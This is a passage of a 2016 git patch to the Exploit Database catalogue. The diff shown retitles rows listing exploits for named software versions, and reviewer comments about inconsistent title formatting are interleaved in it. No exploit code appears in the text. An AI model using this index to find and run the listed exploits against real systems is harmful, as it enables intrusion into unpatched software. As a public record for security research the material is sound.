From da08dab2c603506e442f42edc138c388e3f8a41e Mon Sep 17 00:00:00 2001 
From: Offensive Security
Date: Thu, 10 Mar 2016 05:03:17 +0000
Subject: [PATCH] DB: 2016-03-10 16 new exploits
---
 files.csv | 73 +-
 platforms/linux/dos/39537.txt | 605 +++++++++++++++
 platforms/linux/dos/39538.txt | 1184 +++++++++++++++++++++++++++++
 platforms/linux/dos/39539.txt | 618 +++++++++++++++
 platforms/linux/dos/39540.txt | 622 +++++++++++++++
 platforms/linux/dos/39541.txt | 641 ++++++++++++++++
 platforms/linux/dos/39542.txt | 646 ++++++++++++++++
 platforms/linux/dos/39543.txt | 624 +++++++++++++++
 platforms/linux/dos/39544.txt | 614 +++++++++++++++
 platforms/linux/dos/39545.txt | 23 +
 platforms/linux/local/33336.c | 164 ++++
 platforms/linux/local/39535.sh | 23 +
 platforms/multiple/dos/39529.txt | 71 ++
 platforms/php/webapps/39534.html | 42 +
 platforms/php/webapps/39536.txt | 148 ++++
 platforms/windows/dos/39530.txt | 125 +++
 platforms/windows/dos/39533.txt | 51 ++
 platforms/windows/local/11199.txt | 7 +-
 platforms/windows/local/271.c | 6 +-
 platforms/windows/local/35850.bat | 17 +-
 platforms/windows/local/5951.c | 166 ++--
 platforms/windows/remote/3072.py | 194 ++---
 platforms/windows/remote/3531.py | 242 +++---
 23 files changed, 6564 insertions(+), 342 deletions(-)
 create mode 100755 platforms/linux/dos/39537.txt
 create mode 100755 platforms/linux/dos/39538.txt
 create mode 100755 platforms/linux/dos/39539.txt
 create mode 100755 platforms/linux/dos/39540.txt
 create mode 100755 platforms/linux/dos/39541.txt
 create mode 100755 platforms/linux/dos/39542.txt
 create mode 100755 platforms/linux/dos/39543.txt
 create mode 100755 platforms/linux/dos/39544.txt
 create mode 100755 platforms/linux/dos/39545.txt
 create mode 100755 platforms/linux/local/33336.c
 create mode 100755 platforms/linux/local/39535.sh
 create mode 100755 platforms/multiple/dos/39529.txt
 create mode 100755 platforms/php/webapps/39534.html
 create mode 100755 platforms/php/webapps/39536.txt
 create mode 100755 platforms/windows/dos/39530.txt
 create mode 100755 platforms/windows/dos/39533.txt
diff --git a/files.csv b/files.csv
index d5f4c3bac..007a7238b 100755
--- a/files.csv
+++ b/files.csv
@@ -150,7 +150,7 @@ id,file,description,date,author,platform,type,port
 153,platforms/windows/dos/153.c,"Microsoft Windows - ASN.1 LSASS.EXE Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0
 154,platforms/linux/local/154.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - _mremap()_ Local Proof-of-Concept (2)",2004-02-18,"Christophe Devine",linux,local,0
 155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 Web proxy Remote Buffer Overflow Exploit",2004-02-26,kralor,windows,remote,3128
-156,platforms/windows/remote/156.c,"PSOProxy 0.91 - Remote Buffer Overflow Exploit (Win2k/XP)",2004-02-26,Rave,windows,remote,8080
+156,platforms/windows/remote/156.c,"PSOProxy 0.91 - Remote Buffer Overflow Exploit (Windows 2000/XP)",2004-02-26,Rave,windows,remote,8080
 157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon - Remote Buffer Overflow Exploit",2004-02-27,"Johnny Cyberpunk",windows,remote,389
 158,platforms/windows/remote/158.c,"Serv-U FTPD 3.x/4.x/5.x (MDTM) Remote Overflow Exploit",2004-02-27,Sam,windows,remote,21
 159,platforms/windows/remote/159.c,"WFTPD Server <= 3.21 - Remote Buffer Overflow Exploit",2004-02-29,rdxaxl,windows,remote,21
@@ -256,7 +256,7 @@ id,file,description,date,author,platform,type,port
 268,platforms/windows/remote/268.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow Exploit (2)",2001-05-08,"dark spyrit",windows,remote,80
 269,platforms/linux/remote/269.c,"BeroFTPD 1.3.4(1) - Remote Root Exploit (Linux x86)",2001-05-08,qitest1,linux,remote,21
 270,platforms/irix/local/270.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) /usr/lib/print/netprint Local Exploit",2001-05-08,LSD-PLaNET,irix,local,0
-271,platforms/windows/local/271.c,"Microsoft Windows Utility Manager Local SYSTEM Exploit (MS04-011)",2004-04-15,"Cesar Cerrudo",windows,local,0
+271,platforms/windows/local/271.c,"Microsoft Windows Utility Manager - Local SYSTEM Exploit (MS04-011)",2004-04-15,"Cesar Cerrudo",windows,local,0
 272,platforms/windows/local/272.c,"WinZIP MIME Parsing Overflow Proof of Concept Exploit",2004-04-15,snooq,windows,local,0
 273,platforms/linux/local/273.c,"SquirrelMail chpasswd Buffer Overflow",2004-04-20,x314,linux,local,0
 274,platforms/linux/dos/274.c,"Linux Kernel <= 2.6.3 - (setsockopt) Local Denial of Service Exploit",2004-04-21,"Julien Tinnes",linux,dos,0
@@ -2744,7 +2744,7 @@ id,file,description,date,author,platform,type,port
 3069,platforms/osx/dos/3069.pl,"VLC Media Player 0.8.6 (udp://) Format String Exploit PoC (ppc)",2007-01-02,MoAB,osx,dos,0
 3070,platforms/osx/local/3070.pl,"VLC Media Player 0.8.6 (udp://) Format String Exploit (x86)",2007-01-02,MoAB,osx,local,0
 3071,platforms/windows/local/3071.c,"Microsoft Vista - (NtRaiseHardError) Privilege Escalation Exploit",2007-01-03,erasmus,windows,local,0
-3072,platforms/windows/remote/3072.py,"Apple Quicktime (rtsp URL Handler) Buffer Overflow Exploit (win2k)",2007-01-03,"Winny Thomas",windows,remote,0
+3072,platforms/windows/remote/3072.py,"Apple Quicktime - (rtsp URL Handler) Buffer Overflow Exploit (Windows 2000)",2007-01-03,"Winny Thomas",windows,remote,0
 3073,platforms/asp/webapps/3073.txt,"LocazoList <= 2.01a beta5 (subcatID) Remote SQL Injection Vulnerability",2007-01-03,ajann,asp,webapps,0
 3074,platforms/asp/webapps/3074.txt,"E-SMARTCART 1.0 (product_id) Remote SQL Injection Vulnerability",2007-01-03,ajann,asp,webapps,0
 3075,platforms/php/webapps/3075.pl,"VerliAdmin <= 0.3 (language.php) Local File Inclusion Exploit",2007-01-03,Kw3[R]Ln,php,webapps,0
@@ -3137,7 +3137,7 @@ id,file,description,date,author,platform,type,port
 3471,platforms/php/webapps/3471.txt,"Activist Mobilization Platform (AMP) 3.2 - Remote File Include Vuln",2007-03-13,the_day,php,webapps,0
 3472,platforms/php/webapps/3472.txt,"CARE2X 1.1 (root_path) Remote File Inclusion Vulnerability",2007-03-13,the_day,php,webapps,0
 3473,platforms/php/webapps/3473.txt,"WebCreator <= 0.2.6-rc3 (moddir) Remote File Inclusion Vulnerability",2007-03-13,the_day,php,webapps,0
-3474,platforms/windows/remote/3474.py,"WarFTP 1.65 (USER) Remote Buffer Overflow Exploit (win2k SP4)",2007-03-14,"Winny Thomas",windows,remote,21
+3474,platforms/windows/remote/3474.py,"WarFTP 1.65 - (USER) Remote Buffer Overflow Exploit (Windows 2000 SP4)",2007-03-14,"Winny Thomas",windows,remote,21
 3476,platforms/php/webapps/3476.pl,"Zomplog <= 3.7.6 - Local File Inclusion Vulnerabilty (Win32)",2007-03-14,Bl0od3r,php,webapps,0
 3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 (comments.php id) Remote SQL Injection Exploit",2007-03-14,WiLdBoY,php,webapps,0
 3478,platforms/php/webapps/3478.htm,"Dayfox Blog 4 (postpost.php) Remote Code Execution Vulnerability",2007-03-14,Dj7xpl,php,webapps,0
@@ -3192,13 +3192,13 @@ id,file,description,date,author,platform,type,port
 3528,platforms/php/webapps/3528.pl,"phpRaid < 3.0.7 (rss.php phpraid_dir) Remote File Inclusion Exploit",2007-03-20,"Cold Zero",php,webapps,0
 3529,platforms/linux/local/3529.php,"PHP <= 5.2.1 hash_update_file() Freed Resource Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0
 3530,platforms/php/webapps/3530.pl,"Monster Top List <= 1.4.2 (functions.php root_path) RFI Exploit",2007-03-20,fluffy_bunny,php,webapps,0
-3531,platforms/windows/remote/3531.py,"Helix Server 11.0.1 - Remote Heap Overflow Exploit (win2k SP4)",2007-03-21,"Winny Thomas",windows,remote,554
+3531,platforms/windows/remote/3531.py,"Helix Server 11.0.1 - Remote Heap Overflow Exploit (Windows 2000 SP4)",2007-03-21,"Winny Thomas",windows,remote,554
 3532,platforms/php/webapps/3532.txt,"study planner (studiewijzer) <= 0.15 - Remote File Inclusion Vulnerability",2007-03-21,K-159,php,webapps,0
 3533,platforms/php/webapps/3533.txt,"Digital Eye CMS 0.1.1b (module.php) Remote File Inclusion Vulnerability",2007-03-21,"Cold Zero",php,webapps,0
 3534,platforms/asp/webapps/3534.txt,"Active Link Engine (default.asp catid) Remote SQL Injection Vulnerability",2007-03-21,CyberGhost,asp,webapps,0
 3535,platforms/hardware/dos/3535.pl,"Grandstream Budge Tone-200 IP Phone (Digest domain) DoS Exploit",2007-03-21,MADYNES,hardware,dos,0
 3536,platforms/asp/webapps/3536.txt,"Active Photo Gallery (default.asp catid) SQL Injection Vulnerability",2007-03-21,CyberGhost,asp,webapps,0
-3537,platforms/windows/remote/3537.py,"Mercur Messaging 2005 IMAP (SUBSCRIBE) Remote Exploit (win2k SP4)",2007-03-21,"Winny Thomas",windows,remote,143
+3537,platforms/windows/remote/3537.py,"Mercur Messaging 2005 - IMAP (SUBSCRIBE) Remote Exploit (Windows 2000 SP4)",2007-03-21,"Winny Thomas",windows,remote,143
 3538,platforms/php/webapps/3538.txt,"php-revista <= 1.1.2 - Multiple Remote SQL Injection Vulnerabilities",2007-03-21,"Cold Zero",php,webapps,0
3539,platforms/php/webapps/3539.txt,"mambo component nfnaddressbook 0.4 - Remote File Inclusion Vulnerability",2007-03-21,"Cold Zero",php,webapps,0
 3540,platforms/windows/remote/3540.py,"Mercur Messaging 2005 <= SP4 - IMAP Remote Exploit (egghunter mod)",2007-03-21,muts,windows,remote,143
@@ -3238,7 +3238,7 @@ id,file,description,date,author,platform,type,port
 3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL phpDOC Local Buffer Overflow Exploit",2007-03-25,rgod,windows,local,0
 3577,platforms/windows/remote/3577.html,"Microsoft Internet Explorer - Recordset Double Free Memory Exploit (MS07-009)",2007-03-26,N/A,windows,remote,0
 3578,platforms/bsd/local/3578.c,"FreeBSD mcweject 0.9 (eject) - Local Root Buffer Overflow Exploit",2007-03-26,harry,bsd,local,0
-3579,platforms/windows/remote/3579.py,"Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit (Win2K SP4)",2007-03-26,"Winny Thomas",windows,remote,21
+3579,platforms/windows/remote/3579.py,"Easy File Sharing FTP Server 2.0 - (PASS) Remote Exploit (Windows 2000 SP4)",2007-03-26,"Winny Thomas",windows,remote,21
 3580,platforms/php/webapps/3580.pl,"IceBB 1.0-rc5 - Remote Create Admin Exploit",2007-03-26,Hessam-x,php,webapps,0
 3581,platforms/php/webapps/3581.pl,"IceBB 1.0-rc5 - Remote Code Execution Exploit",2007-03-26,Hessam-x,php,webapps,0
 3582,platforms/php/webapps/3582.pl,"PHP-Nuke Module Addressbook 1.2 - Local File Inclusion Exploit",2007-03-26,bd0rk,php,webapps,0
@@ -3343,7 +3343,7 @@ id,file,description,date,author,platform,type,port
 3685,platforms/php/webapps/3685.txt,"MyBlog: PHP and MySQL Blog/CMS software RFI Vulnerability",2007-04-08,the_Edit0r,php,webapps,0
 3686,platforms/php/webapps/3686.txt,"WitShare 0.9 (index.php menu) Local File Inclusion Vulnerability",2007-04-08,the_Edit0r,php,webapps,0
 3687,platforms/php/webapps/3687.txt,"ScarNews 1.2.1 (sn_admin_dir) Local File Inclusion Exploit",2007-04-08,BeyazKurt,php,webapps,0
-3688,platforms/windows/local/3688.c,"Microsoft Windows GDI - Local Privilege Escalation Exploit (MS07-017)",2007-04-08,Ivanlef0u,windows,local,0
+3688,platforms/windows/local/3688.c,"Microsoft Windows GDI - Local Privilege Escalation Exploit (MS07-017) (1)",2007-04-08,Ivanlef0u,windows,local,0
 3689,platforms/php/webapps/3689.txt,"PcP-Guestbook 3.0 (lang) Local File Inclusion Vulnerabilities",2007-04-08,Dj7xpl,php,webapps,0
 3690,platforms/windows/dos/3690.txt,"Microsoft office word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0
 3691,platforms/php/webapps/3691.txt,"Battle.net Clan Script for PHP 1.5.1 - Remote SQL Injection Vulnerability",2007-04-09,"h a c k e r _ X",php,webapps,0
@@ -3648,7 +3648,7 @@ id,file,description,date,author,platform,type,port
 3993,platforms/windows/remote/3993.html,"Microsoft Internet Explorer 6 / Ademco co. ltd. ATNBaseLoader100 Module - Remote BoF Exploit",2007-05-26,rgod,windows,remote,0
 3994,platforms/php/webapps/3994.txt,"Mazens PHP Chat V3 (basepath) - Remote File Inclusion Vulnerabilities",2007-05-26,"ThE TiGeR",php,webapps,0
 3995,platforms/php/webapps/3995.txt,"TROforum 0.1 (admin.php site_url) Remote File Inclusion Vulnerability",2007-05-26,"Mehmet Ince",php,webapps,0
-3996,platforms/windows/remote/3996.c,"Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)",2007-05-26,fabio/b0x,windows,remote,80
+3996,platforms/windows/remote/3996.c,"Apache 2.0.58 mod_rewrite - Remote Overflow Exploit (Windows 2003)",2007-05-26,fabio/b0x,windows,remote,80
 3997,platforms/php/webapps/3997.txt,"Frequency Clock 0.1b (securelib) Remote File Inclusion Vulnerabilities",2007-05-27,"ThE TiGeR",php,webapps,0
 3998,platforms/php/webapps/3998.php,"Fundanemt <= 2.2.0 (spellcheck.php) Remote Code Execution Exploit",2007-05-27,Kacper,php,webapps,0
 3999,platforms/php/webapps/3999.txt,"Vistered Little 1.6a (skin) Remote File Disclosure Vulnerability",2007-05-28,GoLd_M,php,webapps,0
@@ -3715,7 +3715,7 @@ id,file,description,date,author,platform,type,port
 4062,platforms/php/webapps/4062.pl,"Fuzzylime Forum 1.0 (low.php topic) Remote SQL Injection Exploit",2007-06-12,Silentz,php,webapps,0
 4063,platforms/php/webapps/4063.txt,"xoops module tinycontent 1.5 - Remote File Inclusion Vulnerability",2007-06-12,Sp[L]o1T,php,webapps,0
 4064,platforms/php/webapps/4064.txt,"xoops module horoscope <= 2.0 - Remote File Inclusion Vulnerability",2007-06-12,BeyazKurt,php,webapps,0
-4065,platforms/windows/remote/4065.html,"Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)",2007-06-13,rgod,windows,remote,0
+4065,platforms/windows/remote/4065.html,"Microsoft Speech API ActiveX Control - Remote BoF Exploit (Windows 2000 SP4)",2007-06-13,rgod,windows,remote,0
 4066,platforms/windows/remote/4066.html,"Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)",2007-06-13,rgod,windows,remote,0
 4067,platforms/windows/dos/4067.html,"Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)",2007-06-13,"YAG KOHHA",windows,dos,0
 4068,platforms/php/webapps/4068.txt,"XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability",2007-06-13,Sp[L]o1T,php,webapps,0
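Review bot: Row 4065 is retitled to `Microsoft Speech API ActiveX Control - Remote BoF Exploit (Windows 2000 SP4)`, but the sibling row 4066 on the very next context line keeps the old form `Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)`, so two entries for the same issue now differ in capitalisation, separator and platform wording. The same half-finished normalisation is visible in hunk @@ -29665 (32891 becomes `XP/2003/Vista/2008` while context row 32893 still reads `VISTA/2008`) and in hunk @@ -30083 (33593 gains `Vista` while context row 33594 keeps `VISTA/2008`). Either retitle the sibling rows in the same commit or leave each pair untouched, since anything that groups the description column by platform string will otherwise split entries that belong together.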
@@ -5569,7 +5569,7 @@ id,file,description,date,author,platform,type,port
 5948,platforms/php/webapps/5948.txt,"Jokes Complete Website 2.1.3 (jokeid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0
 5949,platforms/php/webapps/5949.txt,"Drinks Complete Website 2.1.0 (drinkid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0
 5950,platforms/php/webapps/5950.txt,"Cheats Complete Website 1.1.1 (itemid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0
-5951,platforms/windows/local/5951.c,"XnView 1.93.6 for Windows .taac Local Buffer Overflow Exploit PoC",2008-06-26,Shinnok,windows,local,0
+5951,platforms/windows/local/5951.c,"XnView 1.93.6 for Windows - '.taac' Local Buffer Overflow Exploit PoC",2008-06-26,Shinnok,windows,local,0
 5952,platforms/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,CraCkEr,php,webapps,0
 5954,platforms/php/webapps/5954.txt,"A+ PHP Scripts Nms Insecure Cookie Handling Vulnerability",2008-06-26,"Virangar Security",php,webapps,0
 5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 (params.php) Remote File Inclusion Vulnerability",2008-06-26,Ciph3r,php,webapps,0
@@ -7607,7 +7607,7 @@ id,file,description,date,author,platform,type,port
 8077,platforms/windows/dos/8077.html,"Microsoft Internet Explorer 7 - Memory Corruption PoC (MS09-002)",2009-02-18,N/A,windows,dos,0
 8079,platforms/windows/remote/8079.html,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (XP SP2)",2009-02-20,Abysssec,windows,remote,0
 8080,platforms/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (py)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0
-8082,platforms/windows/remote/8082.html,"Microsoft Internet Explorer 7 - Memory Corruption PoC (MS09-002) (win2k3sp2)",2009-02-20,webDEViL,windows,remote,0
+8082,platforms/windows/remote/8082.html,"Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption PoC (MS09-002)",2009-02-20,webDEViL,windows,remote,0
 8083,platforms/php/webapps/8083.txt,"phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include Vulnerability",2009-02-20,Kacper,php,webapps,0
 8084,platforms/windows/dos/8084.pl,"Got All Media 7.0.0.3 - (t00t) Remote Denial of Service Exploit",2009-02-20,LiquidWorm,windows,dos,0
 8085,platforms/cgi/webapps/8085.txt,"i-dreams Mailer 1.2 Final - (admin.dat) File Disclosure Vulnerability",2009-02-20,Pouya_Server,cgi,webapps,0
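Review bot: Row 8082 places the platform qualifier before the dash, `Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption PoC (MS09-002)`, whereas the neighbouring rows 8079 and 8080 in this hunk and every other retitled row in the patch (3072, 3531, 9559, 11384) carry it as a trailing parenthetical after the bulletin or exploit name. For consistency with its siblings the row would read `Microsoft Internet Explorer 7 - Memory Corruption PoC (MS09-002) (Windows 2003 SP2)`. Row 37755 in hunk @@ -34087 has the mirror-image inconsistency: it is left as bare `Windows 2003 SP2 - ...` while 11199, 25912, 33012 and 33593 in this same patch gain the `Microsoft Windows` prefix. One placement and one vendor prefix keep the description column predictable for anyone filtering on a `(Windows ...)` suffix or a `Microsoft Windows` prefix.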
@@ -9005,7 +9005,7 @@ id,file,description,date,author,platform,type,port
 9538,platforms/php/webapps/9538.txt,"Silurus Classifieds System (category.php) SQL Injection Vulnerability",2009-08-28,Mr.SQL,php,webapps,0
 9539,platforms/windows/dos/9539.py,"uTorrent <= 1.8.3 (Build 15772) Create New Torrent Buffer Overflow PoC",2009-08-28,Dr_IDE,windows,dos,0
 9540,platforms/windows/local/9540.py,"HTML Creator & Sender <= 2.3 build 697 - Local BoF Exploit (SEH)",2009-08-28,Dr_IDE,windows,local,0
-9541,platforms/windows/remote/9541.pl,"Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)",2009-08-31,kingcope,windows,remote,21
+9541,platforms/windows/remote/9541.pl,"Microsoft IIS 5.0/6.0 FTP Server - Remote Stack Overflow Exploit (Windows 2000)",2009-08-31,kingcope,windows,remote,21
 9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 - (32-bit) ip_append_data() ring0 Root Exploit",2009-08-31,"INetCop Security",linux,local,0
 9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit",2009-08-31,"Jon Oberheide",linux,local,0
 9544,platforms/php/webapps/9544.txt,"Modern Script <= 5.0 (index.php s) SQL Injection Vulnerability",2009-08-31,Red-D3v1L,php,webapps,0
@@ -9021,7 +9021,7 @@ id,file,description,date,author,platform,type,port
 9554,platforms/windows/dos/9554.html,"Apple iPhone 2.2.1/3.x (MobileSafari) Crash & Reboot Exploit",2009-08-31,TheLeader,windows,dos,0
 9555,platforms/php/webapps/9555.txt,"Mybuxscript PTC-BUX (spnews.php) SQL Injection Vulnerability",2009-08-31,HxH,php,webapps,0
 9556,platforms/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a Code Execution Exploit",2009-08-31,flyh4t,php,webapps,0
-9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 - FTP Server Remote Stack Overflow Exploit (win2k sp4)",2009-09-01,muts,windows,remote,21
+9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 - FTP Server Remote Stack Overflow Exploit (Windows 2000 SP4)",2009-09-01,muts,windows,remote,21
 9560,platforms/windows/local/9560.txt,"Soritong MP3 Player 1.0 - (.m3u/UI.txt) Universal Local BoF Exploits",2009-09-01,hack4love,windows,local,0
 9561,platforms/windows/dos/9561.py,"AIMP2 Audio Converter <= 2.53b330 - (.pls/.m3u) Unicode Crash PoC",2009-09-01,mr_me,windows,dos,0
 9562,platforms/asp/webapps/9562.txt,"JSFTemplating / Mojarra Scales / GlassFish - File Disclosure Vulnerabilities",2009-09-01,"SEC Consult",asp,webapps,0
@@ -9807,7 +9807,7 @@ id,file,description,date,author,platform,type,port
 10560,platforms/php/webapps/10560.txt,"Lizard Cart Multiple SQL Injection Exploit",2009-12-19,"cr4wl3r ",php,webapps,0
 10561,platforms/php/webapps/10561.txt,"CFAGCMS SQL Injection Exploit",2009-12-19,"cr4wl3r ",php,webapps,0
 10562,platforms/php/webapps/10562.txt,"Ptag <= 4.0.0 - Multiple RFI Exploit",2009-12-19,"cr4wl3r ",php,webapps,0
-10563,platforms/windows/local/10563.py,"PlayMeNow Malformed M3U Playlist WinXP Universal BOF",2009-12-19,loneferret,windows,local,0
+10563,platforms/windows/local/10563.py,"PlayMeNow - Malformed M3U Playlist BOF (Windows XP Universal)",2009-12-19,loneferret,windows,local,0
 10564,platforms/php/webapps/10564.txt,"SaurusCMS <= 4.6.4 - Multiple RFI Exploit",2009-12-19,"cr4wl3r ",php,webapps,0
 10566,platforms/php/webapps/10566.txt,"Explorer 7.20 - Cross-Site Scripting Vulnerability",2009-12-20,Metropolis,php,webapps,0
 10567,platforms/php/webapps/10567.txt,"Advance Biz Limited <= 1.0 (Auth Bypass) SQL Injection Vulnerability",2009-12-20,PaL-D3v1L,php,webapps,0
@@ -9843,7 +9843,7 @@ id,file,description,date,author,platform,type,port
 10599,platforms/php/webapps/10599.txt,"The Uploader 2.0 File Disclosure Vulnerability",2009-12-22,Stack,php,webapps,0
 10600,platforms/php/webapps/10600.txt,"mypage 0.4 - Local File Inclusion Vulnerability",2009-12-22,BAYBORA,php,webapps,0
 10601,platforms/php/webapps/10601.txt,"Mini File Host 1.5 - Remote File Upload Vulnerability",2009-12-22,MR.Z,php,webapps,0
-10602,platforms/windows/local/10602.pl,"Easy RM to MP3 27.3.700 - WinXP SP3",2009-12-22,d3b4g,windows,local,0
+10602,platforms/windows/local/10602.pl,"Easy RM to MP3 27.3.700 (Windows XP SP3)",2009-12-22,d3b4g,windows,local,0
 10603,platforms/windows/dos/10603.c,"TFTP Daemon 1.9 - Denial of Service Exploit",2009-12-22,Socket_0x03,windows,dos,0
 10604,platforms/php/webapps/10604.pl,"Simple PHP Blog 0.5.1 - Local File Inclusion Vulnerability",2009-12-22,jgaliana,php,webapps,0
 10606,platforms/php/webapps/10606.txt,"weenCompany SQL Injection Vulnerability",2009-12-22,Gamoscu,php,webapps,0
@@ -9862,7 +9862,7 @@ id,file,description,date,author,platform,type,port
 10624,platforms/php/webapps/10624.txt,"Joomla Component com_carman Cross-Site Scripting Vulnerability",2009-12-24,FL0RiX,php,webapps,0
 10625,platforms/php/webapps/10625.txt,"Joomla Component com_jeemaarticlecollection SQL injection",2009-12-24,FL0RiX,php,webapps,0
 10626,platforms/php/webapps/10626.txt,"Jax Guestbook 3.50 Admin Login Exploit",2009-12-24,Sora,php,webapps,0
-10628,platforms/windows/local/10628.pl,"CastRipper 2.50.70 - (.pls) Stack Buffer Overflow Exploit WinXP SP3",2009-12-24,d3b4g,windows,local,0
+10628,platforms/windows/local/10628.pl,"CastRipper 2.50.70 - (.pls) Stack Buffer Overflow Exploit (Windows XP SP3)",2009-12-24,d3b4g,windows,local,0
 10629,platforms/php/webapps/10629.txt,"Traidnt Gallery add Admin Exploit",2009-12-24,wlhaan-hacker,php,webapps,0
 10630,platforms/multiple/webapps/10630.txt,"ImageVue 2.0 - Remote Admin Login Exploit",2009-12-24,Sora,multiple,webapps,0
 10632,platforms/php/webapps/10632.pl,"Wbb3 - Blind SQL Injection Vulnerability",2009-12-24,molli,php,webapps,0
@@ -9874,7 +9874,7 @@ id,file,description,date,author,platform,type,port
 10640,platforms/php/webapps/10640.txt,"Joomla Component com_schools SQL injection",2009-12-24,Mr.tro0oqy,php,webapps,0
 10642,platforms/windows/local/10642.rb,"Exploit Easy RM to MP3 2.7.3.700 - Ruby",2009-12-24,"John Babio",windows,local,0
 10645,platforms/php/webapps/10645.txt,"PBX Phone System 2.x - Multiple Vulnerabilities",2009-12-24,Global-Evolution,php,webapps,0
-10646,platforms/windows/local/10646.c,"CastRipper (.M3U) Stack BoF WinXP SP2",2009-12-24,bibi-info,windows,local,0
+10646,platforms/windows/local/10646.c,"CastRipper - (.M3U) Stack BoF (Windows XP SP2)",2009-12-24,bibi-info,windows,local,0
 10647,platforms/php/webapps/10647.txt,"VideoIsland Remote shell upload Vulnerability",2009-12-24,RENO,php,webapps,0
 10648,platforms/php/webapps/10648.txt,"cms -db <= 0.7.13 - Multiple Vulnerabilities",2009-12-25,"cp77fk4r ",php,webapps,0
 10649,platforms/windows/webapps/10649.html,"SoftCab Sound Converter ActiveX Insecure Method Exploit (sndConverter.ocx)",2009-12-25,"ThE g0bL!N",windows,webapps,0
@@ -10093,7 +10093,7 @@ id,file,description,date,author,platform,type,port
 10929,platforms/php/webapps/10929.txt,"Wordpress Events Plugin - SQL Injection Vulnerability",2010-01-02,Red-D3v1L,php,webapps,0
 10930,platforms/php/webapps/10930.txt,"Left 4 Dead Stats 1.1 - SQL Injection Vulnerability",2010-01-02,Sora,php,webapps,0
 10931,platforms/php/webapps/10931.txt,"X7CHAT 1.3.6b - Add Admin Exploit",2010-01-02,d4rk-h4ck3r,php,webapps,0
-10936,platforms/windows/local/10936.c,"PlayMeNow - Malformed M3U Playlist BoF WinXP SP2 Fr",2010-01-03,bibi-info,windows,local,0
+10936,platforms/windows/local/10936.c,"PlayMeNow - Malformed M3U Playlist BoF (Windows XP SP2 French)",2010-01-03,bibi-info,windows,local,0
 10938,platforms/php/webapps/10938.txt,"Service d'upload 1.0.0 - Shell Upload Vulnerability",2010-01-03,indoushka,php,webapps,0
 10940,platforms/asp/webapps/10940.txt,"Football Pool 3.1 - Database Disclosure Vulnerability",2010-01-03,LionTurk,asp,webapps,0
 10941,platforms/php/webapps/10941.php,"Joomla Component com_aprice Blind SQL Injection Exploit",2010-01-03,FL0RiX,php,webapps,0
@@ -10279,7 +10279,7 @@ id,file,description,date,author,platform,type,port
 11196,platforms/windows/dos/11196.html,"Foxit Reader 3.1.4.1125 - ActiveX Heap Overflow PoC",2010-01-19,"SarBoT511 and D3V!L FUCKER",windows,dos,0
 11197,platforms/windows/dos/11197.py,"Mini-stream Ripper 3.0.1.1 - (.smi) Local Buffer Overflow PoC",2010-01-19,d3b4g,windows,dos,0
 11198,platforms/php/webapps/11198.txt,"al3jeb script Remote Login Bypass Exploit",2010-01-19,"cr4wl3r ",php,webapps,0
-11199,platforms/windows/local/11199.txt,"Windows NT - User Mode to Ring Escalation Vulnerability (KiTrap0D)",2010-01-19,"Tavis Ormandy",windows,local,0
+11199,platforms/windows/local/11199.txt,"Microsoft Windows NT/2000/XP/2003/Vista/2008/7 - User Mode to Ring Escalation Vulnerability (KiTrap0D)",2010-01-19,"Tavis Ormandy",windows,local,0
 11202,platforms/windows/local/11202.pl,"RM Downloader .m3u BoF (SEH)",2010-01-19,jacky,windows,local,0
 11203,platforms/multiple/remote/11203.py,"Pidgin MSN <= 2.6.4 File Download Vulnerability",2010-01-19,"Mathieu GASPARD",multiple,remote,0
 11204,platforms/windows/remote/11204.html,"AOL 9.5 - ActiveX Exploit (Heap Spray) (0day)",2010-01-20,Dz_attacker,windows,remote,0
@@ -10322,7 +10322,7 @@ id,file,description,date,author,platform,type,port
 11249,platforms/php/webapps/11249.txt,"boastMachine 3.1 - Remote File Upload Vulnerability",2010-01-24,alnjm33,php,webapps,0
 11254,platforms/windows/dos/11254.pl,"P2GChinchilla HTTP Server 1.1.1 - Denial of Service Exploit",2010-01-24,"Zer0 Thunder",windows,dos,0
 11255,platforms/windows/local/11255.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow Exploit",2010-01-25,Dz_attacker,windows,local,0
-11256,platforms/windows/local/11256.pl,"Winamp 5.572 - whatsnew.txt Local Buffer Overflow Exploit WinXP SP3 De",2010-01-25,NeoCortex,windows,local,0
